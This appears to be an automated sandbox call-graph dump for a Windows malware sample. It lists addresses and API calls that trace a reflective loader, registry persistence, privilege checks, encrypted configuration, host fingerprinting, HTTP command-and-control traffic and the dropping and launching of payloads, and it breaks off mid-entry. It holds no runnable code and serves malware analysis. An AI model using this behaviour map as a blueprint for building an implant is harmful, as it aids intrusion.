23709e4 4629 2370483 GetNativeSystemInfo 4629->4628 4630 23704b0 VirtualAlloc 4629->4630 4632 23704c9 4630->4632 4631->4628 4631->4629 4636 10002720 4632->4636 4635 2370275 4634->4635 4635->4627 4639 10001000 4636->4639 4642 10001030 LoadLibraryW GetProcAddress 4639->4642 4682 10001b30 4642->4682 4645 10001091 SetLastError 4678 1000102b 4645->4678 4646 100010a3 4647 10001b30 SetLastError 4646->4647 4648 100010b9 4647->4648 4649 100010f0 4648->4649 4650 100010de SetLastError 4648->4650 4648->4678 4651 10001111 4649->4651 4652 100010ff SetLastError 4649->4652 4650->4678 4653 1000111c SetLastError 4651->4653 4655 1000112e GetNativeSystemInfo 4651->4655 4652->4678 4653->4678 4656 100011bc 4655->4656 4657 100011d7 SetLastError 4656->4657 4658 100011e9 4656->4658 4657->4678 4685 10001800 VirtualAlloc 4658->4685 4659 10001202 4660 1000123d GetProcessHeap RtlAllocateHeap 4659->4660 4663 1000122e SetLastError 4659->4663 4661 10001257 SetLastError 4660->4661 4662 1000127b 4660->4662 4661->4678 4665 10001b30 SetLastError 4662->4665 4663->4678 4666 100012fb 4665->4666 4667 10001302 4666->4667 4686 10001800 VirtualAlloc 4666->4686 4757 100016c0 4667->4757 4668 10001320 4687 10001b50 4668->4687 4671 1000136b 4671->4667 4693 100021a0 4671->4693 4675 100013ca 4675->4667 4676 100013eb 4675->4676 4677 100013ff GetPEB 4676->4677 4676->4678 4714 4003b00 4677->4714 4678->4628 4683 10001070 4682->4683 4684 10001b3b SetLastError 4682->4684 4683->4645 4683->4646 4683->4678 4684->4683 4685->4659 4686->4668 4690 10001b7d 4687->4690 4688 10001b30 SetLastError 4689 10001c32 4688->4689 4691 10001be9 4689->4691 4765 10001800 VirtualAlloc 4689->4765 4690->4688 4690->4691 4691->4671 4694 100013b5 4693->4694 4695 100021dd IsBadHugeReadPtr 4693->4695 4694->4667 4708 10001e80 4694->4708 4695->4694 4697 10002207 4695->4697 4697->4694 4766 10001840 LoadLibraryA 4697->4766 4699 10002239 SetLastError 4699->4694 4700 1000224d 4768 10001a20 4700->4768 4703 10002273 SetLastError 4703->4694 4705 1000229d 4705->4694 4706 100023ae SetLastError 4705->4706 4706->4694 4711 10001eba 4708->4711 4709 10001fe5 4710 10001d10 2 API calls 4709->4710 4713 10001fc1 4710->4713 4711->4709 4711->4713 4783 10001d10 4711->4783 4713->4675 4715 4003b0d 4714->4715 4791 4002ed0 4715->4791 4717 4003b1e GetModuleFileNameA SetUnhandledExceptionFilter CoInitialize 4794 4004510 4717->4794 4719 400400a ExitProcess 4720 4003b54 4720->4719 4812 4005700 4720->4812 4724 4003b9f 4846 4009400 4724->4846 4730 4003be1 4863 4005e00 CreateMutexA GetLastError 4730->4863 4732 4003beb StrStrIA 4864 4001120 4732->4864 4743 4003c92 4912 4005b50 4743->4912 4747 4003df8 4750 4003e30 4747->4750 4952 40078d0 4747->4952 4751 4004020 257 API calls 4750->4751 4752 4003fed Sleep 4750->4752 4755 4003f09 4750->4755 4939 4007970 4750->4939 4751->4750 4752->4750 4755->4750 4756 4003f62 VirtualFree 4755->4756 4956 40042e0 4755->4956 4961 4004020 4755->4961 4756->4755 4758 100016d2 4757->4758 4759 100016d7 4757->4759 4758->4678 4760 100019d0 VirtualFree 4759->4760 4763 1000170b 4760->4763 4761 10001770 GetProcessHeap HeapFree 4761->4758 4763->4761 4764 100019d0 VirtualFree 4763->4764 4764->4761 4765->4691 4767 10001857 4766->4767 4767->4699 4767->4700 4769 10001a35 4768->4769 4770 10001a2c 4768->4770 4774 10001a43 4769->4774 4776 100019f0 VirtualAlloc 4769->4776 4777 10001900 4770->4777 4773 10001a51 4773->4774 4780 100019d0 4773->4780 4774->4703 4774->4705 4776->4773 4778 10001910 VirtualQuery 4777->4778 4779 1000190c 4777->4779 4778->4779 4779->4769 4781 100019d9 VirtualFree 4780->4781 4782 100019ea 4780->4782 4781->4782 4782->4774 4784 10001d29 4783->4784 4788 10001d1f 4783->4788 4785 10001d37 4784->4785 4786 10001d9d VirtualProtect 4784->4786 4785->4788 4790 10001820 VirtualFree 4785->4790 4786->4788 4788->4711 4790->4788 4984 4003090 GetPEB 4791->4984 4793 4002edf 4793->4717 4795 40047e6 4794->4795 4796 4004528 4794->4796 4795->4720 4796->4795 4797 400455b GetModuleFileNameA CreateFileA 4796->4797 4797->4795 4798 40045a4 GetFileSize 4797->4798 4799 40047d0 4798->4799 4800 40045c6 VirtualAlloc 4798->4800 4799->4795 4802 40047d9 CloseHandle 4799->4802 4800->4799 4801 40045ef ReadFile 4800->4801 4803 4004625 4801->4803 4811 400466f 4801->4811 4802->4795 4804 4004637 FindCloseChangeNotification 4803->4804 4803->4811 4985 40047f0 4804->4985 4805 40047b2 VirtualFree 4805->4799 4808 4004681 VirtualFree 4809 400469f 4808->4809 4810 40047f0 15 API calls 4809->4810 4809->4811 4810->4809 4811->4799 4811->4805 4813 4005717 4812->4813 4826 4003b84 4812->4826 5005 4008f80 4813->5005 4819 4005773 5074 4005cd0 4819->5074 4822 40057d1 4823 40057e6 GetAllUsersProfileDirectoryA 4822->4823 4824 40057f9 GetEnvironmentVariableA 4822->4824 4825 4005810 wnsprintfA CreateFileA 4823->4825 4824->4825 4825->4826 4827 4005867 GetFileSize 4825->4827 4833 4005a00 4826->4833 4828 4005886 VirtualAlloc 4827->4828 4829 4005918 CloseHandle 4827->4829 4828->4829 4830 40058ab ReadFile 4828->4830 4829->4826 4831 4005904 VirtualFree 4830->4831 4832 40058e4 4830->4832 4831->4829 4832->4829 4834 4005b44 4833->4834 4835 4005a18 4833->4835 4834->4724 4835->4834 4836 4005a3a lstrcpyA 4835->4836 5099 4005930 4836->5099 4838 4005a62 4839 4005a74 lstrlenA 4838->4839 4839->4834 4840 4005a8c lstrcpyA lstrlenA lstrlenA 4839->4840 4840->4834 4841 4005abf lstrcatA RegCreateKeyExA 4840->4841 4842 4005b16 4841->4842 4843 4005b0a RegCloseKey 4841->4843 4845 4005b25 lstrcpyA 4842->4845 4844 4005b37 lstrlenA 4843->4844 4844->4834 4845->4844 4847 4003bcf 4846->4847 4850 400941a 4846->4850 4852 40099f0 GetCurrentProcess OpenProcessToken 4847->4852 4850->4847 4851 4009502 lstrcpyA CharUpperA 4850->4851 5103 4008bb0 4850->5103 5119 4009650 4850->5119 4851->4850 4853 4009a1f GetTokenInformation 4852->4853 4858 4003bd7 4852->4858 4854 4009a50 GetTokenInformation 4853->4854 4855 4009b76 CloseHandle 4853->4855 4854->4855 4856 4009a85 CreateWellKnownSid EqualSid 4854->4856 4855->4858 4857 4009ad4 CreateWellKnownSid EqualSid 4856->4857 4856->4858 4857->4858 4859 4009b0a CreateWellKnownSid EqualSid 4857->4859 4861 4006060 GetModuleFileNameA 4858->4861 4859->4858 4860 4009b40 CreateWellKnownSid EqualSid 4859->4860 4860->4855 4860->4858 4862 4006091 4861->4862 4862->4730 4863->4732 4865 400113a 4864->4865 4879 4001289 4864->4879 4866 4001144 lstrlenA 4865->4866 4865->4879 4867 4001156 lstrlenA 4866->4867 4866->4879 4868 4001168 4867->4868 4867->4879 4869 4001177 GetAllUsersProfileDirectoryA 4868->4869 4870 400118a GetEnvironmentVariableA 4868->4870 4871 40011a1 wnsprintfA lstrcmpiA 4869->4871 4870->4871 4872 4001216 4871->4872 4873 40011db 4871->4873 5128 40097a0 GetProcessHeap RtlAllocateHeap 4872->5128 4873->4872 4874 40011e3 CopyFileA SetFileAttributesA lstrcpyA 4873->4874 4874->4872 4876 4001220 lstrcpyA lstrcpyA CreateThread 4877 40012a3 4876->4877 4876->4879 5129 40012d0 4876->5129 4878 40097c0 2 API calls 4877->4878 4878->4879 4880 4005e30 4879->4880 4881 4005e64 RegOpenKeyExA 4880->4881 4882 4005e5d 4880->4882 4883 4005e8c RegQueryValueExA 4881->4883 4884 4003c39 4881->4884 4882->4881 4885 4005edc 4883->4885 4886 4005ebc 4883->4886 4891 4006cf0 4884->4891 4887 4005f15 RegCloseKey 4885->4887 5135 4009bd0 4885->5135 4886->4885 4888 4005ece RegDeleteValueA 4886->4888 4887->4884 4888->4885 4892 4006d13 RegOpenKeyExA 4891->4892 4893 4006d0c 4891->4893 4894 4006d3a RegQueryValueExA 4892->4894 4895 4003c4d 4892->4895 4893->4892 4896 4006d70 RegDeleteValueA 4894->4896 4897 4006d84 RegCloseKey 4894->4897 4898 4005f30 4895->4898 4896->4897 4897->4895 5139 4007d20 4898->5139 4901 4005f92 4902 4005f99 RegOpenKeyExA 4901->4902 4903 4005fc1 RegQueryValueExA 4902->4903 4904 4003c58 4902->4904 4905 4005ffc 4903->4905 4909 4009b90 4904->4909 4906 4006041 RegCloseKey 4905->4906 4907 4009bd0 QueryPerformanceCounter 4905->4907 4906->4904 4908 4006020 RegSetValueExA 4907->4908 4908->4906 4910 4009ba0 QueryPerformanceCounter 4909->4910 4911 4003c71 WSAStartup 4909->4911 4910->4911 4911->4719 4911->4743 4913 4005b67 4912->4913 4914 4003dac 4912->4914 4913->4914 4915 4005b7b lstrlenA lstrlenA 4913->4915 4926 4008a70 4914->4926 4916 4005ba3 4915->4916 4917 4005be0 VirtualAlloc 4916->4917 4918 4005bab StrStrIA 4916->4918 4917->4914 4920 4005c09 4917->4920 4918->4916 4919 4005bdc 4918->4919 4919->4917 4921 4005c7f 4920->4921 4922 4005c1f StrStrIA 4920->4922 4921->4914 4924 4005c91 VirtualAlloc 4921->4924 4922->4921 4923 4005c39 lstrcpynA 4922->4923 4923->4920 4924->4914 4925 4005cad 4924->4925 4925->4914 4927 4008ba3 4926->4927 4928 4008a87 4926->4928 4927->4747 4928->4927 4929 4008ab9 CryptAcquireContextA 4928->4929 4930 4008b12 4929->4930 4931 4008add GetLastError 4929->4931 4930->4927 4932 4008b1c CryptImportKey 4930->4932 4933 4008af8 CryptAcquireContextA 4931->4933 4934 4008aef 4931->4934 4935 4008b41 CryptImportKey 4932->4935 4936 4008b97 CryptReleaseContext 4932->4936 4933->4930 4934->4930 4934->4933 4937 4008b68 CryptDecrypt CryptDestroyKey 4935->4937 4938 4008b8d CryptDestroyKey 4935->4938 4936->4927 4937->4938 4938->4936 4940 4007987 VirtualAlloc 4939->4940 4941 4007ae9 4939->4941 4940->4941 4942 40079b6 4940->4942 4941->4750 5141 400a400 4942->5141 4945 4007ad8 VirtualFree 4945->4941 4946 4008a70 9 API calls 4947 4007a15 4946->4947 4947->4945 4948 4007a20 VirtualAlloc 4947->4948 4948->4945 4949 4007a5a 4948->4949 4950 4007ad0 4949->4950 4951 4007a89 inet_ntoa wnsprintfA 4949->4951 4950->4945 4951->4949 4953 40078e4 4952->4953 4954 4007965 4952->4954 4953->4954 4955 4007927 inet_ntoa wnsprintfA 4953->4955 4954->4750 4955->4953 4957 40044fd 4956->4957 4958 40042fa VirtualAlloc 4956->4958 4957->4755 4958->4957 4960 40044a3 4958->4960 4960->4957 5148 40092e0 4960->5148 4962 40042d7 4961->4962 4963 4004034 4961->4963 4962->4755 4963->4962 4964 400405f InitializeCriticalSection CreateEventA 4963->4964 4965 400409f 4964->4965 4966 40040ab EnterCriticalSection 4965->4966 4967 40042cd DeleteCriticalSection 4965->4967 4968 40040da 4966->4968 4969 40040bb VirtualFree 4966->4969 4967->4962 4970 40040e0 TerminateThread 4968->4970 4971 40040f3 ResetEvent LeaveCriticalSection CreateThread 4968->4971 4969->4968 4970->4971 5156 40097a0 GetProcessHeap RtlAllocateHeap 4971->5156 5210 4004ac0 4971->5210 4973 4004221 WaitForMultipleObjects WaitForSingleObject 4974 400424b 4973->4974 4975 400424f WaitForSingleObject 4973->4975 4974->4975 4977 4004273 EnterCriticalSection 4975->4977 4978 4004267 TerminateThread 4975->4978 4976 400413a 4976->4973 4981 40041d5 CreateEventA CreateThread WaitForSingleObject FindCloseChangeNotification 4976->4981 4979 40042a2 LeaveCriticalSection 4977->4979 4980 4004283 VirtualFree 4977->4980 4978->4977 4982 40097c0 2 API calls 4979->4982 4980->4979 4981->4976 5157 4004ba0 CoInitialize 4981->5157 4983 40042bb 4982->4983 4983->4967 4984->4793 4986 4004807 4985->4986 4987 4004665 4985->4987 4986->4987 4988 4004814 CryptAcquireContextA 4986->4988 4987->4808 4987->4809 4987->4811 4989 4004834 GetLastError 4988->4989 4991 4004856 4988->4991 4990 4004841 CryptAcquireContextA 4989->4990 4989->4991 4990->4991 4991->4987 4992 4004a9f CryptReleaseContext 4991->4992 4993 40048be CryptCreateHash 4991->4993 4992->4987 4994 4004a90 4993->4994 4995 40048f9 CryptHashData 4993->4995 4994->4992 4996 4004a83 CryptDestroyHash 4995->4996 4997 4004919 CryptDeriveKey 4995->4997 4996->4994 4997->4996 4998 400494a CryptDecrypt CryptDestroyKey 4997->4998 4998->4996 4999 4004995 CryptCreateHash 4998->4999 4999->4996 5000 40049b7 CryptHashData 4999->5000 5001 4004a76 CryptDestroyHash 5000->5001 5002 40049da CryptGetHashParam 5000->5002 5001->4996 5002->5001 5003 4004a11 CryptGetHashParam 5002->5003 5003->5001 5004 4004a3e 5003->5004 5004->5001 5006 400572e GetModuleFileNameA 5005->5006 5007 4008f9a 5005->5007 5045 4001ca0 CreateToolhelp32Snapshot 5006->5045 5007->5006 5008 4008fed GetVersionExA 5007->5008 5009 4009005 GetSystemInfo 5008->5009 5010 4009266 5008->5010 5011 4009115 5009->5011 5012 400901c 5009->5012 5010->5006 5013 400926c lstrcatA 5010->5013 5016 4009174 5011->5016 5017 400912b 5011->5017 5037 4009110 5011->5037 5014 4009042 5012->5014 5015 4009025 lstrcatA 5012->5015 5013->5006 5019 400904b lstrcatA 5014->5019 5028 4009068 5014->5028 5015->5037 5023 400917d 5016->5023 5031 40091c3 5016->5031 5020 4009134 lstrcatA 5017->5020 5021 400914e 5017->5021 5019->5037 5020->5037 5024 4009157 lstrcatA 5021->5024 5021->5037 5029 40091a0 5023->5029 5030 4009186 lstrcatA 5023->5030 5024->5037 5025 4009228 lstrlenA 5032 4009259 lstrlenA 5025->5032 5033 4009239 lstrcatA lstrcatA 5025->5033 5026 4009219 lstrcatA 5026->5025 5027 40090a1 GetSystemMetrics 5035 40090c7 GetSystemMetrics 5027->5035 5036 40090ad lstrcatA 5027->5036 5028->5027 5034 4009087 lstrcatA 5028->5034 5028->5037 5029->5037 5038 40091a9 lstrcatA 5029->5038 5030->5037 5031->5037 5039 40091d5 lstrcatA 5031->5039 5040 40091ef 5031->5040 5032->5010 5033->5032 5034->5037 5042 40090d3 lstrcatA 5035->5042 5043 40090ed 5035->5043 5036->5037 5084 4009290 GetModuleHandleA GetProcAddress 5037->5084 5038->5037 5039->5037 5040->5037 5041 40091f8 lstrcatA 5040->5041 5041->5037 5042->5037 5043->5037 5044 40090f8 lstrcatA 5043->5044 5044->5037 5046 4001e51 5045->5046 5047 4001cc9 Process32First 5045->5047 5063 4009d20 5046->5063 5048 4001e44 CloseHandle 5047->5048 5049 4001cee GetCurrentProcessId 5047->5049 5048->5046 5050 4001d04 5049->5050 5051 4001d20 Process32Next 5050->5051 5052 4001d12 5050->5052 5051->5050 5051->5052 5052->5048 5053 4001d44 Process32First 5052->5053 5053->5048 5054 4001d5f 5053->5054 5055 4001d71 lstrlenA 5054->5055 5056 4001e29 Process32Next 5054->5056 5057 4001e27 5055->5057 5058 4001d87 lstrcpyA OpenProcess 5055->5058 5056->5048 5056->5054 5057->5048 5058->5057 5059 4001dbb EnumProcessModules 5058->5059 5060 4001e02 GetProcessImageFileNameA 5059->5060 5061 4001de5 GetModuleFileNameExA 5059->5061 5062 4001e16 FindCloseChangeNotification 5060->5062 5061->5062 5062->5057 5064 4009d37 5063->5064 5065 4009f5d 5063->5065 5064->5065 5066 4009d4b GetSystemDirectoryA 5064->5066 5065->4819 5066->5065 5067 4009da8 GetVolumeInformationA 5066->5067 5067->5065 5068 4009deb 5067->5068 5087 4009f70 5068->5087 5072 4009f50 CoTaskMemFree 5072->5065 5073 4009f0c WideCharToMultiByte lstrcpynA 5073->5072 5075 4005ce7 lstrlenA 5074->5075 5076 400579d lstrcpyA 5074->5076 5075->5076 5077 4005cfa CreateFileA 5075->5077 5076->4822 5077->5076 5078 4005d23 GetFileSize 5077->5078 5079 4005d38 VirtualAlloc 5078->5079 5080 4005d9f FindCloseChangeNotification 5078->5080 5079->5080 5081 4005d54 ReadFile 5079->5081 5080->5076 5082 4005d7b 5081->5082 5083 4005d8e VirtualFree 5081->5083 5082->5083 5083->5080 5085 4009215 5084->5085 5086 40092bd GetCurrentProcess 5084->5086 5085->5025 5085->5026 5086->5085 5088 4009f87 5087->5088 5093 4009e2d StringFromCLSID 5087->5093 5088->5093 5095 40097a0 GetProcessHeap RtlAllocateHeap 5088->5095 5090 4009fb2 5091 4009fc8 GetAdaptersInfo 5090->5091 5090->5093 5094 4009ff4 5091->5094 5093->5072 5093->5073 5096 40097c0 5094->5096 5095->5090 5097 40097c9 GetProcessHeap HeapFree 5096->5097 5098 40097dc 5096->5098 5097->5098 5098->5093 5100 40059f3 5099->5100 5101 4005949 5099->5101 5100->4838 5101->5100 5102 40059de CharUpperA 5101->5102 5102->5101 5104 4008ce7 5103->5104 5105 4008bc7 5103->5105 5104->4850 5105->5104 5106 4008be5 CryptAcquireContextA 5105->5106 5107 4008c09 GetLastError 5106->5107 5108 4008c3e 5106->5108 5109 4008c24 CryptAcquireContextA 5107->5109 5110 4008c1b 5107->5110 5108->5104 5111 4008c48 CryptCreateHash 5108->5111 5109->5108 5110->5108 5110->5109 5112 4008c63 CryptHashData 5111->5112 5113 4008cdb CryptReleaseContext 5111->5113 5114 4008cd1 CryptDestroyHash 5112->5114 5115 4008c7b CryptGetHashParam 5112->5115 5113->5104 5114->5113 5115->5114 5116 4008ca3 5115->5116 5116->5114 5117 4008cab CryptGetHashParam 5116->5117 5117->5114 5118 4008ccb 5117->5118 5118->5114 5120 4009722 5119->5120 5121 4009667 5119->5121 5120->4850 5121->5120 5122 4009685 lstrlenA 5121->5122 5126 4009699 5122->5126 5123 40096fd lstrlenA 5124 4009715 lstrlenA 5123->5124 5125 400970c 5123->5125 5124->5120 5125->5124 5126->5123 5127 40096d4 lstrcatA lstrlenA 5126->5127 5127->5126 5128->4876 5130 40012fc 5129->5130 5131 40012e6 5129->5131 5131->5130 5132 400131d RegOpenKeyExA 5131->5132 5133 4001341 lstrlenA RegSetValueExA RegCloseKey 5132->5133 5134 4001378 Sleep 5132->5134 5133->5134 5134->5131 5136 4005ef6 RegSetValueExA 5135->5136 5137 4009bda 5135->5137 5136->4887 5137->5136 5138 4009b90 QueryPerformanceCounter 5137->5138 5138->5137 5140 4005f58 lstrcpyA lstrcatA 5139->5140 5140->4901 5140->4902 5142 40079d2 5141->5142 5143 400a417 5141->5143 5142->4945 5142->4946 5143->5142 5144 400a442 RegOpenKeyExA 5143->5144 5144->5142 5145 400a466 RegQueryValueExA 5144->5145 5146 400a490 RegCloseKey 5145->5146 5147 400a48a 5145->5147 5146->5142 5147->5146 5149 40093f8 5148->5149 5150 40092fa 5148->5150 5149->4960 5150->5149 5151 4009304 GetLocalTime 5150->5151 5153 4009322 5151->5153 5152 4008bb0 9 API calls 5152->5153 5153->5149 5153->5152 5154 4009650 5 API calls 5153->5154 5155 40093c9 lstrcatA 5154->5155 5155->5153 5156->4976 5158 40056f0 CoUninitialize 5157->5158 5159 4004bc2 5157->5159 5160 4004bd1 SetEvent 5159->5160 5161 4004bf9 5160->5161 5161->5158 5162 4004c10 WaitForSingleObject 5161->5162 5163 4004c28 VirtualAlloc VirtualAlloc VirtualAlloc 5161->5163 5162->5163 5164 4004c23 5162->5164 5163->5164 5165 4004c8a 5163->5165 5164->5158 5165->5164 5168 4004cc3 5165->5168 5169 40052a2 5165->5169 5173 4004db7 GetCurrentThreadId 5168->5173 5174 4004e2c 5168->5174 5179 4004ce5 5168->5179 5223 4008370 5169->5223 5170 4005354 lstrlenA lstrlenA 5171 40056b8 VirtualFree VirtualFree VirtualFree 5170->5171 5172 4005385 wsprintfA CryptBinaryToStringA 5170->5172 5171->5164 5172->5171 5175 40053d0 MultiByteToWideChar 5172->5175 5173->5179 5176 4004ee1 5174->5176 5177 4004e81 GetSystemMetrics GetSystemMetrics 5174->5177 5174->5179 5242 40017d0 5175->5242 5180 4004ef0 GlobalMemoryStatus 5176->5180 5182 4004f40 5176->5182 5177->5179 5180->5179 5181 400569b 5181->5171 5183 40056a4 VirtualFree 5181->5183 5182->5179 5187 4005032 5182->5187 5188 4004fdf lstrlenA 5182->5188 5183->5171 5185 400551b 5185->5181 5190 400552c EnterCriticalSection 5185->5190 5186 400547d VirtualFree 5189 40054b1 5186->5189 5191 4005041 lstrlenA 5187->5191 5192 4005096 5187->5192 5188->5179 5189->5185 5199 40017d0 16 API calls 5189->5199 5195 4005542 VirtualAlloc 5190->5195 5196 400558c VirtualAlloc 5190->5196 5191->5179 5193 4005104 5192->5193 5194 40050a5 lstrlenA 5192->5194 5201 4005172 5193->5201 5202 4005113 lstrlenA 5193->5202 5194->5179 5200 4005578 5195->5200 5197 40055c7 GetTickCount 5196->5197 5198 400568e LeaveCriticalSection 5196->5198 5208 40055da 5197->5208 5198->5181 5199->5189 5200->5198 5203 40051e0 5201->5203 5204 4005181 lstrlenA 5201->5204 5202->5179 5205 400523f 5203->5205 5206 40051ef lstrlenA 5203->5206 5204->5179 5205->5179 5207 4009b90 QueryPerformanceCounter 5205->5207 5206->5179 5207->5179 5209 400565c VirtualFree 5208->5209 5209->5198 5211 4004b96 5210->5211 5212 4004ad6 CoInitialize 5210->5212 5213 4004ade 5212->5213 5214 4004b80 Sleep 5213->5214 5215 4004aeb WaitForSingleObject 5213->5215 5214->5213 5215->5214 5216 4004b01 EnterCriticalSection 5215->5216 5300 4008250 5216->5300 5219 4004b50 5305 40062b0 5219->5305 5222 4004b90 CoUninitialize 5222->5211 5224 4005344 5223->5224 5225 4008387 5223->5225 5224->5170 5224->5171 5225->5224 5226 40083b1 VirtualAlloc VirtualAlloc 5225->5226 5227 4008592 5226->5227 5228 40083e9 5226->5228 5229 4008598 VirtualFree 5227->5229 5230 40085a9 5227->5230 5228->5227 5246 4008800 5228->5246 5229->5230 5230->5224 5232 40085af VirtualFree 5230->5232 5232->5224 5238 400847e 5268 4008970 5238->5268 5240 4008581 VirtualFree 5240->5227 5241 40084ad 5241->5240 5243 400181e 5242->5243 5244 40017e1 5242->5244 5243->5181 5243->5185 5243->5186 5244->5243 5279 4001840 5244->5279 5247 4008817 5246->5247 5248 4008420 5246->5248 5247->5248 5249 4008821 CryptAcquireContextA 5247->5249 5248->5227 5262 4008770 5248->5262 5250 4008845 GetLastError 5249->5250 5251 400887a 5249->5251 5252 4008860 CryptAcquireContextA 5250->5252 5253 4008857 5250->5253 5251->5248 5254 4008884 CryptGenKey 5251->5254 5252->5251 5253->5251 5253->5252 5255 4008950 CryptReleaseContext 5254->5255 5256 40088bd CryptExportKey 5254->5256 5255->5248 5257 4008946 CryptDestroyKey 5256->5257 5258 40088d9 5256->5258 5257->5255 5259 400893d 5258->5259 5260 40088f1 CryptImportKey 5258->5260 5259->5257 5260->5259 5261 4008916 CryptExportKey CryptDestroyKey 5260->5261 5261->5259 5263 40087d0 QueryPerformanceCounter 5262->5263 5264 400844b 5263->5264 5265 40087d0 5264->5265 5266 40087e3 QueryPerformanceCounter 5265->5266 5267 4008458 VirtualAlloc 5265->5267 5266->5267 5267->5227 5267->5238 5269 4008a60 5268->5269 5270 4008987 5268->5270 5269->5241 5270->5269 5271 40089a5 CryptAcquireContextA 5270->5271 5272 40089c9 GetLastError 5271->5272 5273 40089fe 5271->5273 5274 40089e4 CryptAcquireContextA 5272->5274 5275 40089db 5272->5275 5273->5269 5276 4008a04 CryptImportKey 5273->5276 5274->5273 5275->5273 5275->5274 5277 4008a54 CryptReleaseContext 5276->5277 5278 4008a29 CryptEncrypt CryptDestroyKey 5276->5278 5277->5269 5278->5277 5280 4001c95 5279->5280 5281 400185a 5279->5281 5280->5243 5281->5280 5282 40018ba InternetCrackUrlA 5281->5282 5282->5280 5283 4001910 InternetOpenA 5282->5283 5283->5280 5284 4001936 InternetConnectA 5283->5284 5285 4001c88 InternetCloseHandle 5284->5285 5286 400196f HttpOpenRequestA 5284->5286 5285->5280 5287 4001c7b InternetCloseHandle 5286->5287 5288 40019ad wnsprintfA HttpAddRequestHeadersA 5286->5288 5287->5285 5289 40019eb InternetSetOptionA 5288->5289 5290 4001c6e InternetCloseHandle 5288->5290 5299 4001a30 5289->5299 5290->5287 5292 4001a4d HttpSendRequestA 5293 4001a7b HttpQueryInfoA 5292->5293 5292->5299 5293->5299 5294 4001adc HttpQueryInfoA 5295 4001b47 VirtualAlloc 5294->5295 5294->5299 5296 4001c19 5295->5296 5295->5299 5297 4001c23 InternetReadFile 5296->5297 5297->5297 5297->5299 5298 4001b99 InternetReadFile 5298->5299 5299->5290 5299->5292 5299->5294 5299->5295 5299->5298 5301 4004b37 LeaveCriticalSection 5300->5301 5304 4008267 5300->5304 5301->5214 5301->5219 5302 40082e7 StrStrA 5302->5301 5302->5304 5304->5301 5304->5302 5388 4008090 5304->5388 5307 40062ca 5305->5307 5315 4004b5d VirtualFree SetEvent 5305->5315 5306 4006427 5308 40064ba GetEnvironmentVariableA 5306->5308 5306->5315 5317 40065f3 5306->5317 5307->5306 5309 4006399 5307->5309 5307->5315 5312 40064e1 5308->5312 5310 4006410 5309->5310 5311 40063a4 VirtualAlloc 5309->5311 5316 4001ee0 2 API calls 5310->5316 5314 400640e 5311->5314 5323 40063cc 5311->5323 5410 4009730 5312->5410 5313 4006bdd 5313->5315 5484 400a360 5313->5484 5314->5306 5315->5222 5316->5314 5317->5313 5449 4007250 5317->5449 5324 40063fd VirtualFree 5323->5324 5407 4001ee0 CreateThread 5323->5407 5324->5314 5325 4006552 WriteFile 5329 4006588 5325->5329 5330 40065dd 5325->5330 5326 4006752 5334 40069ba GetEnvironmentVariableA 5326->5334 5337 4006858 5326->5337 5338 400678e VirtualAlloc 5326->5338 5327 4006654 VirtualAlloc 5327->5326 5331 400667a 5327->5331 5329->5330 5335 4006593 CloseHandle 5329->5335 5330->5317 5333 40065e6 CloseHandle 5330->5333 5461 40097a0 GetProcessHeap RtlAllocateHeap 5331->5461 5333->5317 5336 40069e1 5334->5336 5414 4006c60 5335->5414 5344 4009730 QueryPerformanceCounter 5336->5344 5340 4002070 32 API calls 5337->5340 5341 4006856 5338->5341 5350 40067c6 5338->5350 5340->5341 5354 4006880 5341->5354 5355 4006894 5341->5355 5376 40069a6 5341->5376 5347 40069f2 GetTickCount GetTempFileNameA CreateFileA 5344->5347 5353 4006a4f 5347->5353 5384 4006bbd 5347->5384 5348 4006698 CreateThread CloseHandle 5348->5326 5349 4006842 VirtualFree 5349->5341 5350->5349 5462 4002070 5350->5462 5351 40065d8 5359 4006cf0 4 API calls 5351->5359 5352 40065c9 5426 40074a0 5352->5426 5360 4006a7b VirtualAlloc 5353->5360 5361 4006b1e WriteFile 5353->5361 5465 40073c0 5354->5465 5357 400698a 5355->5357 5472 40097a0 GetProcessHeap RtlAllocateHeap 5355->5472 5357->5376 5473 4002510 5357->5473 5359->5330 5364 4006b1c 5360->5364 5375 4006aaf 5360->5375 5361->5364 5368 4006bc9 CloseHandle 5364->5368 5372 4006b59 CloseHandle 5364->5372 5368->5384 5369 4006809 VirtualAlloc 5378 400683f 5369->5378 5370 40068aa 5373 40068e9 VirtualAlloc 5370->5373 5374 40068ca 5370->5374 5377 4001e60 2 API calls 5372->5377 5373->5374 5379 400690f 5373->5379 5374->5357 5383 400693f CreateThread CloseHandle 5374->5383 5380 4006ad2 WriteFile 5375->5380 5381 4006b08 VirtualFree 5375->5381 5376->5334 5382 4006b72 5377->5382 5378->5349 5379->5374 5380->5381 5381->5364 5382->5384 5385 4006b9e 5382->5385 5386 40073c0 5 API calls 5382->5386 5383->5357 5512 40077b0 5383->5512 5384->5313 5385->5384 5387 4002510 8 API calls 5385->5387 5386->5385 5387->5384 5389 4008246 5388->5389 5390 40080a7 5388->5390 5389->5304 5390->5389 5391 40080c5 VirtualAlloc 5390->5391 5391->5389 5392 40080eb 5391->5392 5400 4001390 5392->5400 5394 4008204 5394->5389 5395 4008235 VirtualFree 5394->5395 5395->5389 5396 4008100 5396->5394 5397 4008a70 9 API calls 5396->5397 5398 40081dd 5397->5398 5398->5394 5399 40081e4 VirtualAlloc 5398->5399 5399->5394 5401 400139c 5400->5401 5402 40013ae 5400->5402 5401->5402 5403 40013b6 GetProcessHeap RtlAllocateHeap 5401->5403 5402->5396 5403->5402 5405 40013e4 5403->5405 5404 40014e4 GetProcessHeap RtlFreeHeap 5404->5402 5405->5404 5406 4001498 GetProcessHeap HeapFree 5405->5406 5406->5402 5408 4001f0a WaitForSingleObject 5407->5408 5409 4001f21 5407->5409 5408->5409 5409->5324 5411 4009743 5410->5411 5413 40064f2 GetTickCount GetTempFileNameA CreateFileA 5410->5413 5412 4009763 QueryPerformanceCounter 5411->5412 5411->5413 5412->5411 5413->5317 5413->5325 5415 4006c83 RegOpenKeyExA 5414->5415 5416 4006c7c 5414->5416 5417 40065ab 5415->5417 5418 4006ca7 5415->5418 5416->5415 5421 4001e60 5417->5421 5419 4009b90 QueryPerformanceCounter 5418->5419 5420 4006cae RegSetValueExA RegCloseKey 5419->5420 5420->5417 5422 4001ece 5421->5422 5423 4001e73 5421->5423 5422->5351 5422->5352 5424 4001e90 CreateProcessA 5423->5424 5424->5422 5425 4001ebe CloseHandle 5424->5425 5425->5422 5427 40074bc 5426->5427 5428 40074d2 Sleep 5427->5428 5429 40074f5 GetModuleFileNameA 5428->5429 5430 400750b 5428->5430 5431 4007583 SetFileAttributesA wnsprintfA 5429->5431 5432 